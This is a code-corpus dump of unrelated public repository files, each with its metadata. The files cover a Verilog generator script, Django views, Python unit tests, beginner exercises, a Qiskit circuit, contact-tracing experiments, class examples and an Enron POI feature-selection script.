if mode == 2:
n_slaves = int(input('How many slave devices are used: '))
p_n_slaves = list(range(n_slaves))
for i in range(n_slaves):
p_n_slaves[i] = int(input(' Input address of slave device number - ' + str(i+1) + ': '))
p_prefix = input('\nInput prefix for module name (slave_select_{your prefix}.v): ')
txt = select_module.render(
t_prefix = p_prefix,
t_cnt_slaves = n_slaves,
t_n_slaves = p_n_slaves)
file_name = 'slave_select_'+p_prefix+'.v'
file = open(file_name,'w')
file.write(txt)
file.close()
print('\n >>> ' + file_name + ' - file was generated in root folder! \n\n')
input(' >>> for exit push Enter ... <<<')
|
[
"sokolov.inf@gmail.com"
] |
sokolov.inf@gmail.com
|
e4ad5ddfc19faf828896a5390b7e32dcbca21979
|
78158f942bd0e223f11016457a494c76b7a689b4
|
/plugins/SocialGraph/config.py
|
f7b5039e8640b8d83d85ce4a1a1076001ef8f51f
|
[] |
no_license
|
frumiousbandersnatch/supybot-plugins
|
ad607dd22529372d72c7dc0083100b5b5cdb719b
|
8c7f16c0584bdf393a56dccff6b35a83142e5ece
|
refs/heads/master
| 2021-01-17T05:46:10.917776
| 2020-03-12T11:42:20
| 2020-03-12T11:42:20
| 6,639,759
| 0
| 1
| null | 2020-03-12T11:42:22
| 2012-11-11T15:21:36
|
Python
|
UTF-8
|
Python
| false
| false
| 517
|
py
|
import supybot.conf as conf
import supybot.registry as registry
def configure(advanced):
# This will be called by supybot to configure this module. advanced is
# a bool that specifies whether the user identified himself as an advanced
# user or not. You should effect your configuration by manipulating the
# registry as appropriate.
from supybot.questions import expect, anything, something, yn
conf.registerPlugin('SocialGraph', True)
WrestlingName = conf.registerPlugin('SocialGraph')
|
[
"ehs@pobox.com"
] |
ehs@pobox.com
|
015eb0ac14909f10bea1681372d9aa89d4b289ac
|
5dde29075e35f8a05f616f29bf4571f8dae0524b
|
/tests/test_base.py
|
08acaf8d01905203335449f280212a0587a42022
|
[
"BSD-3-Clause"
] |
permissive
|
ferringb/pkgcheck
|
a78d88af09f73373ee1fdd2c4055d5fe113c2807
|
b4bf5585a2ecfc4de1a8fa29e1e00303330f0dc3
|
refs/heads/master
| 2023-01-18T20:56:00.456332
| 2021-09-26T22:05:57
| 2021-09-26T22:05:57
| 230,175,990
| 0
| 0
|
BSD-3-Clause
| 2019-12-26T01:48:29
| 2019-12-26T01:48:28
| null |
UTF-8
|
Python
| false
| false
| 2,382
|
py
|
from itertools import chain
from unittest.mock import patch
from pkgcheck import base
from pkgcheck.base import ProgressManager
class TestScope:
def test_rich_comparisons(self):
assert base.commit_scope < base.repo_scope
assert base.commit_scope < 0
assert base.commit_scope <= base.repo_scope
assert base.commit_scope <= 0
assert base.repo_scope > base.commit_scope
assert base.repo_scope > 0
assert base.repo_scope >= base.commit_scope
assert base.repo_scope >= 0
assert base.repo_scope == base.repo_scope
assert base.repo_scope == 1
assert base.repo_scope != base.commit_scope
assert base.repo_scope != 0
def test_hash(self):
assert base.repo_scope in {base.repo_scope, base.commit_scope}
def test_repr(self):
assert base.repo_scope.desc in repr(base.repo_scope)
def test_str(self):
assert base.repo_scope.desc in str(base.repo_scope)
class TestProgressManager:
def test_no_output(self, capsys):
# output disabled due to lower verbosity setting
with patch('sys.stdout.isatty', return_value=True):
with ProgressManager(verbosity=-1) as progress:
for x in range(10):
progress(x)
# output disabled due to non-tty output
with patch('sys.stdout.isatty', return_value=False):
with ProgressManager(verbosity=1) as progress:
for x in range(10):
progress(x)
out, err = capsys.readouterr()
assert not out
assert not err
def test_output(self, capsys):
with patch('sys.stdout.isatty', return_value=True):
with ProgressManager(verbosity=0) as progress:
for x in range(10):
progress(x)
out, err = capsys.readouterr()
assert not out
assert not err.strip().split('\r') == list(range(10))
def test_cached_output(self, capsys):
with patch('sys.stdout.isatty', return_value=True):
with ProgressManager(verbosity=0) as progress:
data = list(range(10))
for x in chain.from_iterable(zip(data, data)):
progress(x)
out, err = capsys.readouterr()
assert not out
assert not err.strip().split('\r') == list(range(10))
|
[
"radhermit@gmail.com"
] |
radhermit@gmail.com
|
d42c47da828d77723a5a248917170553ed107bf9
|
a49c1d05915bddbf0f427fe186eb122ad2ee4ede
|
/projects/views.py
|
cc753ffafe1f55f1a03e204751b116325182d875
|
[] |
no_license
|
thereactgirl/django-portfolio
|
b07419b3ac8efef2df89af7974e67a1fc5d1b315
|
731327bb7821756493437b1bc6b4ae9a01f346d9
|
refs/heads/master
| 2022-12-01T09:35:48.993151
| 2020-08-10T07:08:03
| 2020-08-10T07:08:03
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 596
|
py
|
from django.shortcuts import render
from projects.models import Project
# Create your views here.
def project_index(request):
projects = Project.objects.all() #query for projects
context = {
'projects': projects #context dictionary
}
return render(request, 'project_index.html', context) # must render context dictionary and html template
def project_detail(request, pk): # for the detailed view include project id
project = Project.objects.get(pk=pk)
context = {
'project': project
}
return render(request, 'project_detail.html', context)
|
[
"rleslie1015@gmail.com"
] |
rleslie1015@gmail.com
|
691b4ee48d114a28ea256f9028708f9f690df351
|
0b616edf70bbc094cd48681483821d063b3e2560
|
/Ch03/3-3.py
|
0ce9b2bb2ba8da6637da100da94ea6e3f842c71e
|
[] |
no_license
|
fkrhtmq123/Python
|
c7cf7c8ccc34707acae3112cc2f3960a6c92bbb7
|
b78919978526a0b7732cf5c2f6a6e4485f89d187
|
refs/heads/master
| 2022-11-15T07:28:06.817912
| 2020-07-13T05:18:23
| 2020-07-13T05:18:23
| 274,057,487
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,195
|
py
|
"""
날짜 : 2020/06/23
이름 : 김동욱
내용 : for문 p138
"""
# for
# 리스트를 이용한 for
nums = [1, 2, 3, 4, 5]
for n in nums:
print('n :', n)
for a in ['tiger', 'lion', 'eagle', 'bear']:
print('a :', a)
# 튜플 이용한 for
for n in (1, 2, 3, 4, 5):
print('n :', n)
# range 함수를 이용한 for
for num in range(5):
print('num :', num)
for v in range(1, 10):
print('v :', v)
# 1부터 10까지 합
sum = 0
for k in range(1, 11):
sum += k
print('1부터 10까지 합 :', sum)
# 1부터 10까지 짝수 합
tot = 0
for k in range(1, 11):
if k%2 == 0:
tot += k
print('1부터 10까지 짝수 합 :', tot)
# 이중 for문
for a in range(0, 3):
print('a :', a)
for b in range(0, 5):
print('b :', b)
# 구구단
for a in range(2, 10):
print(a, '단 출력')
for b in range(1, 10):
print(a, ' X ', b, ' = ', a * b)
"""print('%d x %d = %d' % (a, b, a*b)"""
# 별삼각형
for a in range(0, 10):
for b in range(1, a+1):
print('☆', end='')
print()
for n in range(1, 11):
print('★'*n)
for a in range(11, 1, -1):
print('★'*a)
# 별 피라미드 해보기
|
[
"fkrhtmq123@naver.com"
] |
fkrhtmq123@naver.com
|
a10b50e11d524957d20b64e2e00c60711eb9a684
|
c066978635abb98e225918ff0bdaa31329439e3c
|
/python/1-string/451-frequencySort.py
|
702acddee3122ca304f3f17fa5c0ee8f8f583c5e
|
[] |
no_license
|
thangln1003/python-practice
|
7281cb0d4623546cbdae6eb672e204a3197e3a7d
|
85304503181fa1e7916426ea6945f5adc0ce1934
|
refs/heads/master
| 2021-07-05T06:47:49.637915
| 2021-04-04T08:34:59
| 2021-04-04T08:34:59
| 229,037,389
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 734
|
py
|
""" 451. Sort Characters By Frequency (Medium)
https://leetcode.com/problems/sort-characters-by-frequency/
Given a string, sort it in decreasing order based on the frequency of characters.
Input: "tree"
Output: "eert"
Explanation:
'e' appears twice while 'r' and 't' both appear once.
So 'e' must appear before both 'r' and 't'. Therefore "eetr" is also a valid answer.
Input: "cccaaa"
Output: "cccaaa"
Explanation:
Both 'c' and 'a' appear three times, so "aaaccc" is also a valid answer.
Note that "cacaca" is incorrect, as the same characters must be together.
Input: "Aabb"
Output: "bbAa"
Explanation:
"bbaA" is also a valid answer, but "Aabb" is incorrect.
Note that 'A' and 'a' are treated as two different characters.
"""
|
[
"thangln1003@gmail.com"
] |
thangln1003@gmail.com
|
014367303f6c49de1800e7dd7221a17535c2fe9d
|
2ff7e53d5e512cd762217ca54317982e07a2bb0c
|
/notifications/__init__.py
|
b9cc97c7b85c60cb5c0c671c1641c792f00287da
|
[] |
no_license
|
nanxijw/Clara-Pretty-One-Dick
|
66d3d69426642b79e8fd4cc8e0bec23adeeca6d6
|
50de3488a2140343c364efc2615cf6e67f152be0
|
refs/heads/master
| 2021-01-19T09:25:07.555284
| 2015-02-17T21:49:33
| 2015-02-17T21:49:33
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 68
|
py
|
#Embedded file name: notifications\__init__.py
__author__ = 'aevar'
|
[
"billchang.e@gmail.com"
] |
billchang.e@gmail.com
|
83778c8e64b830d0fe06f3a95c4fef5f372e9f32
|
09e57dd1374713f06b70d7b37a580130d9bbab0d
|
/benchmark/startQiskit_noisy942.py
|
0dd1ec7427375daac5006c408b415f74f1c13ea9
|
[
"BSD-3-Clause"
] |
permissive
|
UCLA-SEAL/QDiff
|
ad53650034897abb5941e74539e3aee8edb600ab
|
d968cbc47fe926b7f88b4adf10490f1edd6f8819
|
refs/heads/main
| 2023-08-05T04:52:24.961998
| 2021-09-19T02:56:16
| 2021-09-19T02:56:16
| 405,159,939
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,893
|
py
|
# qubit number=5
# total number=37
import cirq
import qiskit
from qiskit.providers.aer import QasmSimulator
from qiskit.test.mock import FakeVigo
from qiskit import QuantumCircuit, QuantumRegister, ClassicalRegister
from qiskit import BasicAer, execute, transpile
from pprint import pprint
from qiskit.test.mock import FakeVigo
from math import log2,floor, sqrt, pi
import numpy as np
import networkx as nx
def build_oracle(n: int, f) -> QuantumCircuit:
# implement the oracle O_f^\pm
# NOTE: use U1 gate (P gate) with \lambda = 180 ==> CZ gate
# or multi_control_Z_gate (issue #127)
controls = QuantumRegister(n, "ofc")
oracle = QuantumCircuit(controls, name="Zf")
for i in range(2 ** n):
rep = np.binary_repr(i, n)
if f(rep) == "1":
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
# oracle.h(controls[n])
if n >= 2:
oracle.mcu1(pi, controls[1:], controls[0])
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
# oracle.barrier()
return oracle
def make_circuit(n:int,f) -> QuantumCircuit:
# circuit begin
input_qubit = QuantumRegister(n,"qc")
classical = ClassicalRegister(n, "qm")
prog = QuantumCircuit(input_qubit, classical)
prog.h(input_qubit[0]) # number=3
prog.h(input_qubit[1]) # number=4
prog.h(input_qubit[2]) # number=5
prog.h(input_qubit[2]) # number=34
prog.cz(input_qubit[3],input_qubit[2]) # number=35
prog.h(input_qubit[2]) # number=36
prog.y(input_qubit[2]) # number=33
prog.h(input_qubit[3]) # number=6
prog.h(input_qubit[4]) # number=21
Zf = build_oracle(n, f)
repeat = floor(sqrt(2 ** n) * pi / 4)
for i in range(1):
prog.append(Zf.to_gate(), [input_qubit[i] for i in range(n)])
prog.h(input_qubit[0]) # number=1
prog.h(input_qubit[1]) # number=2
prog.h(input_qubit[2]) # number=7
prog.h(input_qubit[3]) # number=8
prog.h(input_qubit[3]) # number=30
prog.cz(input_qubit[4],input_qubit[3]) # number=31
prog.h(input_qubit[3]) # number=32
prog.h(input_qubit[2]) # number=29
prog.cx(input_qubit[1],input_qubit[0]) # number=22
prog.cx(input_qubit[3],input_qubit[1]) # number=25
prog.x(input_qubit[0]) # number=23
prog.cx(input_qubit[1],input_qubit[0]) # number=24
prog.x(input_qubit[1]) # number=10
prog.x(input_qubit[2]) # number=11
prog.x(input_qubit[3]) # number=12
prog.x(input_qubit[1]) # number=27
if n>=2:
prog.mcu1(pi,input_qubit[1:],input_qubit[0])
prog.x(input_qubit[0]) # number=13
prog.x(input_qubit[1]) # number=14
prog.x(input_qubit[2]) # number=15
prog.x(input_qubit[3]) # number=16
prog.h(input_qubit[0]) # number=17
prog.h(input_qubit[1]) # number=18
prog.h(input_qubit[2]) # number=19
prog.h(input_qubit[3]) # number=20
prog.h(input_qubit[0])
prog.h(input_qubit[1])
prog.h(input_qubit[2])
prog.h(input_qubit[3])
# circuit end
for i in range(n):
prog.measure(input_qubit[i], classical[i])
return prog
if __name__ == '__main__':
key = "00000"
f = lambda rep: str(int(rep == key))
prog = make_circuit(5,f)
backend = FakeVigo()
sample_shot =7924
info = execute(prog, backend=backend, shots=sample_shot).result().get_counts()
backend = FakeVigo()
circuit1 = transpile(prog,backend,optimization_level=2)
writefile = open("../data/startQiskit_noisy942.csv","w")
print(info,file=writefile)
print("results end", file=writefile)
print(circuit1.depth(),file=writefile)
print(circuit1,file=writefile)
writefile.close()
|
[
"wangjiyuan123@yeah.net"
] |
wangjiyuan123@yeah.net
|
34c3fdd1c045b1209e80a5701469eaae26b8808e
|
95ed9b1002e760d10cad2b5b15d73e3360b9ae0a
|
/dive-into-python3/os_path.py
|
b48800e9b8216aa13c93cb8052e36deb95f54611
|
[
"MIT"
] |
permissive
|
richard-ma/weekendProject
|
609a07393bc51b452218ed7bf76cfcf6ec949cff
|
4880e4c8a8046d8e6c3dedcbc6ce26e0862ada72
|
refs/heads/master
| 2023-08-16T12:28:39.463062
| 2023-08-12T04:48:03
| 2023-08-12T04:48:03
| 120,096,496
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,111
|
py
|
#!/usr/bin/env python
# encoding: utf-8
import unittest
import os
class TestPath(unittest.TestCase):
def setUp(self):
self.work_dir = '/etc'
def tearDown(self):
pass
# 获得当前工作目录和设置当前工作目录
def test_getcwd(self):
os.chdir(self.work_dir)
self.assertEqual(
self.work_dir,
os.getcwd())
# 展开home目录
def test_expanduser(self):
self.assertEqual(
'/home/richardma',
os.path.expanduser('~'))
# 为路径添加斜杠
def test_path_join(self):
self.assertEqual(
'/foo/bar',
os.path.join('/foo', 'bar'))
# 分离目录、文件名、扩展名
def test_path_parse(self):
pathname = '/foo/bar/test.py'
dirname, filename = os.path.split(pathname)
self.assertEqual(
['/foo/bar', 'test.py'],
[dirname, filename])
shortname, extension = os.path.splitext(filename)
self.assertEqual(
['test', '.py'],
[shortname, extension])
# 列出目录中的所有文件和目录
def test_get_files_of_directory(self):
import glob
os.chdir(self.work_dir) # 设置工作目录
# 使用通配符过得所有文件目录
self.assertTrue(
'hosts' in glob.glob('*')) # /etc目录下有hosts文件
self.assertTrue(
'grub.d' in glob.glob('*')) # /etc目录下有hosts文件
# 获取文件信息
def test_file_metadata(self):
os.chdir(self.work_dir) # 设置工作目录
#print(os.stat('hosts'))
self.assertTrue(os.stat('hosts')) # hosts文件的信息,例如修改时间等
# 获取文件绝对路径
def test_get_realpath(self):
os.chdir(self.work_dir) # 设置工作目录
self.assertEqual(
'/etc/hosts',
os.path.realpath('hosts')) # 参数问工作目录下的文件名,返回绝对路径
if __name__ == '__main__':
unittest.main()
|
[
"richard.ma.19850509@gmail.com"
] |
richard.ma.19850509@gmail.com
|
60d7a6f64029d21b7467ff43512efac0d23c5213
|
35c20226eea3dd11b5b19f226400d6a1f38fa362
|
/ctrace/experiments.py
|
aaa5be6d694054b9902d87f3fd72f12632774fa5
|
[] |
no_license
|
Ann924/ContactTracing
|
131457ad3c540ac65d3e78920d6f97bed552e641
|
fccae40b795be624a1401a8fe658a5c3335b8c4c
|
refs/heads/main
| 2023-02-27T04:19:51.723237
| 2021-01-26T03:09:59
| 2021-01-26T03:09:59
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,301
|
py
|
from time import perf_counter
from .dataset import load_sir
from .solve import *
from .utils import min_exposed_objective, indicatorToSet
TrackerInfo = namedtuple("TrackerInfo", ['value', 'sol', 'isOptimal', 'maxD', 'I_size', 'v1_size', 'v2_size', 'num_cross_edges'])
def time_trial_tracker(G: nx.graph, I0, safe, cost_constraint, p=.5, method="dependent"):
"""
Runs to_quarantine and tracks various statistics. Used in conjunction with GridExecutor
(GridExecutorParallel or GridExecutorLinear) to track run statistics.
Parameters
----------
G
I0
safe
cost_constraint
p
method
Returns
-------
value, sol, isOptimal, maxD, I_size, v1_size, v2_size, num_cross_edges
value: the MinExposed objective value (expected number of people exposed)
sol: an dictionary mapping from V1 IDs to its indicator variables
isOptimal: (-1, 0, 1) -> (does not apply, false, true)
# Statistics
maxD: the maximum number of neighbors of V1 that are in V2
I_size: size of I
v1_size: size of V_1
v2_size: size of V_2
num_cross_edges: number of edges between v1 and v2
"""
costs = np.ones(len(G.nodes))
V_1, V_2 = find_excluded_contours(G, I0, safe)
P, Q = PQ_deterministic(G, I0, V_1, p)
maxD = max_neighbors(G, V_1, V_2)
if method == "weighted":
obj_val, sol, info = weighted_solver(G, I0, P, Q, V_1, V_2, cost_constraint, costs)
return TrackerInfo(obj_val, sol, -1, maxD, *info)
elif method == "dependent":
# Dependent LP Rounding
prob = ProbMinExposed(G, I0, V_1, V_2, P, Q, cost_constraint, costs, solver="GUROBI")
obj_val, sol = basic_non_integer_round(prob)
return TrackerInfo(obj_val, sol, -1, maxD, len(prob.I), len(prob.V1), len(prob.V2), prob.num_cross_edges)
elif method == "dependent_scip":
prob = ProbMinExposed(G, I0, V_1, V_2, P, Q, cost_constraint, costs)
obj_val, sol = basic_non_integer_round(prob)
return TrackerInfo(obj_val, sol, -1, maxD, len(prob.I), len(prob.V1), len(prob.V2), prob.num_cross_edges)
elif method == "gurobi":
# Gurobi MIP Rounding
prob = ProbMinExposedMIP(G, I0, V_1, V_2, P, Q, cost_constraint, costs, solver='GUROBI')
prob.solve_lp()
# Returns a tuple for its optimal value
obj_val = prob.objective_value
sol = prob.quarantined_solution
isOptimal = prob.is_optimal
return TrackerInfo(obj_val, sol, isOptimal, maxD, len(prob.I), len(prob.V1), len(prob.V2), prob.num_cross_edges)
else:
raise Exception("invalid method for optimization")
return_params = ['I_size', 'v1_size', 'v2_size', 'num_cross_edges', 'maxD', 'mip_value', 'min_exposed_value', 'duration', 'v1_objective', 'greedy_overlap']
TimeTrialExtendTrackerInfo = namedtuple("TrackerInfo", return_params)
def time_trial_extended_tracker(G: nx.graph, p, budget, method, from_cache, **kwargs):
"""
Runs to_quarantine and tracks various statistics
Parameters
----------
G
p
budget
method
p
method
from_cache
Returns
-------
min_exposed_value: MinExposed objective value (expected number of people exposed)
mip_value: the MinExposed LP objective value
greedy_intersection: the percentage of quarantined members shared with weighted greedy
# Statistics
maxD: the maximum number of neighbors of V1 that are in V2
I_size: size of I
v1_size: size of V_1
v2_size: size of V_2
num_cross_edges: number of edges between v1 and v2
duration: the time it took to execute the method specified
"""
SIR = load_sir(from_cache, merge=True)
infected = SIR["I"]
recovered = SIR["R"]
costs = np.ones(len(G.nodes))
contour1, contour2 = find_excluded_contours(G, infected, recovered)
P, Q = PQ_deterministic(G, infected, contour1, p)
maxD = max_neighbors(G, contour1, contour2)
# The constant value contour1 contributes to the objective value
v1_objective = sum(P[u] for u in contour1)
# start time
weighted_start = perf_counter()
_, weighted_solution = weighted_solver(G, infected, P, Q, contour1, contour2, budget, costs)
# end time
weighted_end = perf_counter()
if method == "greedy_weighted":
prob = ProbMinExposed(G, infected, contour1, contour2, P, Q, budget, costs)
for k, v in weighted_solution.items():
prob.set_variable_id(k, v)
prob.solve_lp()
min_exposed_value = min_exposed_objective(G, (_, infected, recovered), (contour1, contour2), p, weighted_solution)
return TimeTrialExtendTrackerInfo(
len(infected),
len(contour1),
len(contour2),
prob.num_cross_edges,
maxD,
prob.objective_value,
min_exposed_value,
weighted_end - weighted_start,
v1_objective,
-1,
)
elif method == "greedy_degree":
_, method_solution = degree_solver(G, contour1, contour2, budget)
prob = ProbMinExposed(G, infected, contour1, contour2, P, Q, budget, costs)
# TODO: Quick hack for finding the MIP Objective Value
for k, v in method_solution.items():
prob.set_variable_id(k, v)
prob.solve_lp()
mip_value = prob.objective_value
# Returns: mip_value, method_solution
elif method == "random":
_, method_solution = random_solver(contour1, budget)
prob = ProbMinExposed(G, infected, contour1, contour2, P, Q, budget, costs)
# TODO: Quick hack for finding the MIP Objective Value
for k, v in method_solution.items():
prob.set_variable_id(k, v)
prob.solve_lp()
mip_value = prob.objective_value
elif method == "dependent":
# Dependent LP Rounding
prob = ProbMinExposed(G, infected, contour1, contour2, P, Q, budget, costs, solver="GUROBI_LP")
mip_value, method_solution = basic_non_integer_round(prob)
# Returns mip_value and method_solution
elif method == "dependent_scip":
prob = ProbMinExposed(G, infected, contour1, contour2, P, Q, budget, costs)
mip_value, method_solution = basic_non_integer_round(prob)
elif method == "mip_gurobi":
# Gurobi MIP Rounding
prob = ProbMinExposedMIP(G, infected, contour1, contour2, P, Q, budget, costs, solver='GUROBI')
prob.solve_lp()
# Returns a tuple for its optimal value
mip_value = prob.objective_value
method_solution = prob.quarantined_solution
else:
raise Exception("invalid method for optimization")
method_end = perf_counter()
# Round method solution?
greedy_intersection = len(indicatorToSet(method_solution) & indicatorToSet(weighted_solution))
# TODO: Encapsulate G, (_, infected, recovered), (contour1, contour2)
min_exposed_value = min_exposed_objective(G, (_, infected, recovered), (contour1, contour2), p, method_solution)
return TimeTrialExtendTrackerInfo(
len(infected),
len(contour1),
len(contour2),
prob.num_cross_edges,
maxD,
mip_value,
min_exposed_value,
method_end - weighted_end,
v1_objective,
greedy_intersection
)
|
[
"thezachzhao@gmail.com"
] |
thezachzhao@gmail.com
|
eadeffec247f5ef8290283ceb4722d0e91036a41
|
518e9cbf940b5addb2194a96f277050c44963121
|
/Python/Practices/linked_list/partition.py
|
dd89c3e7c54f1d5f265cbb8007df97bd6e1324d9
|
[] |
no_license
|
Mr-Perfection/coding_practice
|
58322192b76a2ab70c4ae11cd05b3bf993272c52
|
41df85292a151eef3266b01545124aeb4e831286
|
refs/heads/master
| 2021-01-11T02:24:26.234486
| 2017-04-11T00:21:10
| 2017-04-11T00:21:10
| 70,965,532
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,036
|
py
|
"""
Partition: Write code to partition a linked list around a value x, such that all nodes less than x come before all nodes greater than or equal to x.
lf x is contained within the list, the values of x only need to be after the elements less than x (see below).
The partition element x can appear anywhere in the "right partition";
it does not need to appear between the left and right partitions.
"""
def partition(head,value):
# create temp nodes
part1_head,part2_head = Node(0),Node(0)
part2_tail = part2_head
part1_tail = part1_head
# iterate through the linked-list
while head:
temp = head.next
# if head data is less than value, add to part1_tail
if head.data < value:
part1_tail.next = head
head.next = None
part1_tail = part1_tail.next
else:
part2_tail.next = head
head.next = None
part2_tail = part2_tail.next
head = temp
part1_tail.next = part2_head.next
return part1_head.next
|
[
"sungsoolee0127@gmail.com"
] |
sungsoolee0127@gmail.com
|
65e7db376a133d0dfe36fdef08d21cf36dde8544
|
3d33351066af15c2ff96af824008ddb2fdb8b36e
|
/Week 5/week 5 handouts/animalTagged.py
|
075d049b3361a5d12924c48df50444ad8e1b4fe3
|
[] |
no_license
|
ElAwbery/MIT-6.00.1x
|
90a638c668c4a55211b67bdef686d1e03e4623c7
|
27db39bdaaa97514621692d589bbbc50f5b8f567
|
refs/heads/master
| 2021-10-30T10:14:37.007697
| 2019-04-26T05:03:38
| 2019-04-26T05:03:38
| 122,979,335
| 3
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,704
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Sat Jun 11 11:14:45 2016
@author: ericgrimson
"""
class Animal(object):
def __init__(self, age):
self.age = age
self.name = None
def get_age(self):
return self.age
def get_name(self):
return self.name
def set_age(self, newage):
self.age = newage
def set_name(self, newname=""):
self.name = newname
def __str__(self):
return "animal:"+str(self.name)+":"+str(self.age)
class Cat(Animal):
def speak(self):
print("meow")
def __str__(self):
return "cat:"+str(self.name)+":"+str(self.age)
class Rabbit(Animal):
tag = 1
def __init__(self, age, parent1=None, parent2=None):
Animal.__init__(self, age)
self.parent1 = parent1
self.parent2 = parent2
self.rid = Rabbit.tag
Rabbit.tag += 1
def get_rid(self):
return str(self.rid).zfill(3)
def get_parent1(self):
return self.parent1
def get_parent2(self):
return self.parent2
def __add__(self, other):
# returning object of same type as this class
return Rabbit(0, self, other)
def __eq__(self, other):
parents_same = self.parent1.rid == other.parent1.rid \
and self.parent2.rid == other.parent2.rid
parents_opposite = self.parent2.rid == other.parent1.rid \
and self.parent1.rid == other.parent2.rid
return parents_same or parents_opposite
peter = Rabbit(2)
peter.set_name('Peter')
hopsy = Rabbit(3)
hopsy.set_name('Hopsy')
cotton = Rabbit(1, peter, hopsy)
cotton.set_name('Cottontail')
mopsy = peter + hopsy
print(mopsy == cotton)
|
[
"noreply@github.com"
] |
ElAwbery.noreply@github.com
|
c7a87c658bc66890763e3bc43881671cab053525
|
8a8df373bc13407d809dee93d994f95db4544cfc
|
/day0210/tk1.py
|
6c39720ee261deed36fe992629b8b33c2772f6ae
|
[] |
no_license
|
karakazeviewview/PythonTraining
|
b351e6f6a0fb89f9dee9e2304776e953ad8d6325
|
f4d845a271f12b3055ac8df2b332e31a5e0a320d
|
refs/heads/master
| 2023-03-04T07:17:41.744984
| 2021-02-12T05:50:29
| 2021-02-12T05:50:29
| 338,234,944
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 393
|
py
|
import tkinter as tk
def bt_click():
btn['text']='Clicked!'
root=tk.Tk()
root.title('My Window') #windowタイトルを設定
root.geometry('600x400') #windowの大きさを設定
#文字出力のためのラベルを作成
#ボタンを作成
btn=tk.Button(root,text='Hello World!',font=('Arial',50),command=bt_click) #fontはタプル
#labelを配置
btn.place(x=100,y=100)
root.mainloop()
|
[
"mitsuru.matsuo.great@gmail.com"
] |
mitsuru.matsuo.great@gmail.com
|
6076b1ed3a2cc19ad47bd0a1b97182735fd9e88b
|
f1fb9cca8152e53aa15bb49b5238f3d603b787b9
|
/LeetCode/lc_108_ConvertSortedArrayToBinarySearchTree.py
|
b210c494716d9033d929723a035a3bae7e3bde50
|
[] |
no_license
|
albertmenglongli/Algorithms
|
3a636ab9bb1655a6d4caf5e6e250de6c1d7f3ee8
|
59bb0715f705be5c2edc410a93913ab391c5f7ce
|
refs/heads/master
| 2022-07-03T05:07:37.840785
| 2020-07-16T13:48:57
| 2020-07-16T13:48:57
| 49,275,329
| 6
| 2
| null | 2022-06-21T21:16:33
| 2016-01-08T14:05:09
|
Python
|
UTF-8
|
Python
| false
| false
| 545
|
py
|
# Definition for a binary tree node.
class TreeNode(object):
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution(object):
def sortedArrayToBST(self, nums):
"""
:type nums: List[int]
:rtype: TreeNode
"""
if not nums:
return None
mid = len(nums) / 2
root = TreeNode(nums[mid])
root.left = self.sortedArrayToBST(nums[0:mid])
root.right = self.sortedArrayToBST(nums[mid + 1:])
return root
|
[
"albert.menglongli@gmail.com"
] |
albert.menglongli@gmail.com
|
713b2d179d79e39323efb1afe0dd75c666facb1f
|
15a95ac074649b45fd2b4fbf3b831ff7de1679fa
|
/algorithms/Recursion/merge.py
|
231b9fd4db64fab61bdb7b4d5d33c7efb14db30b
|
[] |
no_license
|
tjforeman/cs-notes
|
bdffdaf523454b60abd85ac88c45a14ea61a3dc5
|
b28161bf0daa718c9f2524cb05ca3e4803f7faed
|
refs/heads/master
| 2020-08-30T08:38:19.222153
| 2019-12-24T04:50:48
| 2019-12-24T04:50:48
| 218,321,564
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 281
|
py
|
# Merge sort basics
# Step 1: split into smaller lists
# [5 9 3 7 2 8 1 6]
# [5 9 3 7] [2 8 1 6]
# [5 9] [3 7] [2 8] [1 6]
# [5] [9] [3] [7] [2] [8] [1] [6]
# step 2: merge
# [5] [9] [3] [7] [2] [8] [1] [6]
# [5 9] [3 7] [2 8] [1 6]
# [3 5 7 9] [ 1 2 6 8]
# [1 2 3 5 6 7 8 9]
|
[
"tylerforeman92@gmail.com"
] |
tylerforeman92@gmail.com
|
5e126d6672edc4ca6de3f1fef85ac19444ff9145
|
6bcc99ad1bce4216b6d89eda661904dc69e705db
|
/05/poi_id.py
|
f904fa99c298394a778e10807fe53d9e80f3e0e8
|
[] |
no_license
|
kiquin/DAND
|
476534d4a869c97c8892d6b753d8e12bb4b7e9a0
|
f72125db2f3f35e16c7c0db2c965b4a0172c0a5a
|
refs/heads/master
| 2022-09-16T00:37:01.746208
| 2022-08-25T17:01:21
| 2022-08-25T17:01:21
| 147,237,533
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,726
|
py
|
#!/usr/bin/python
import sys
import pickle
sys.path.append("../tools/")
from feature_format import featureFormat, targetFeatureSplit
from tester import dump_classifier_and_data
### Task 1: Select what features you'll use.
### features_list is a list of strings, each of which is a feature name.
### The first feature must be "poi".
features_list = ['poi', 'salary', 'total_payments', 'bonus', 'deferred_income',
'total_stock_value', 'expenses', 'exercised_stock_options', 'other',
'long_term_incentive', 'restricted_stock', 'to_messages',
'from_poi_to_this_person', 'from_messages', 'from_this_person_to_poi',
'shared_receipt_with_poi']
### Load the dictionary containing the dataset
with open("final_project_dataset.pkl", "r") as data_file:
data_dict = pickle.load(data_file)
### Task 2: Remove outliers
import pandas as pd
import numpy as np
df = pd.DataFrame.from_dict(data_dict, orient = 'index')
df = df.replace('NaN', np.nan)
df = df.drop(['TOTAL'])
### Task 3: Create new feature(s)
df['bonus_percent'] = df['salary']/df['total_payments']
df['poi_messages'] = df['from_poi_to_this_person']+df['from_this_person_to_poi']+df['shared_receipt_with_poi']
new_features = ['bonus_percent', 'poi_messages']
### Store to my_dataset for easy export below.
df = df.fillna('NaN')
my_dataset = df.T.to_dict()
### Extract features and labels from dataset for local testing
features_list += new_features
data = featureFormat(my_dataset, features_list, sort_keys = True)
